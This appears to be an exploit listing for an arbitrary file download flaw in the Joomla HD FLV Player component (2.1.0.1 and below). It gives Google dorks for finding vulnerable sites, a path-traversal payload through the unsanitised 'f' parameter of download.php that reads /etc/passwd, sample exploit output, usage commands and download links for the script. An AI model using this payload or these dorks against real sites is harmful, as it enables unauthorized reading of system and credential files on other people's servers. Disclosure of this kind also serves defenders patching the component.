Joomla HD FLV Player Arbitrary File Download Vulnerability

joomla hd flv

Info

# Exploit Title :  Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1:  inurl:/component/hdflvplayer/
# Dork google 2:  inurl:com_hdflvplayer    
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: 
#       Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
#       The variable "f" is not sanitized.
#       Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/QvBTKFLBQ20
#

Exploit Preview

claudio@backbox3:~/claudio$ python j00m_hd_flv_afd.py -t http://target -f /etc/passwd

        _______                      __           ___ ___ ______
       |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \
       |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \
       |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \
       |:  1   |                                 |:  |   |:  1    /
       |::.. . |                                 |::.|:. |::.. . /
       `-------'                                 `--- ---`------'
        _______ ___     ___ ___     _______ __
       |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|
       |:  |   |:  1   |:  1   |   |:  |            |_____|
       |::.|   |::.. . |\:.. ./    |::.|
       `---'   `-------' `---'     `---'

                                         <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              info@homelab.it
                          homelabit@protonmail.ch

                      https://www.facebook.com/homelabit
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[+] Searching HD FLV Extension...: FOUND
[+] Checking Version: 2.1.0.1
[+] Exploiting...please wait: ######
[!] VULNERABLE
[*] 3v1l Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../../../..//etc/passwd

[+] Do you want [D]ownload or [R]ead the file?
[+]
[+] Please respond with 'D' or 'R': d
[!] DOWNLOADED!
[!] Check file: passwd

Download

Download:
         j00m_hd_flv_afd.py
         j00m_hd_flv_afd.py (Mega Mirror)

Exploit Usage

claudio@backbox3:~$ python j00m_hd_flv_afd.py -t http[s]://localhost[:PORT] -f filname
                    python j00m_hd_flv_afd.py -t http[s]://localhost[:PORT]/basedir -f filename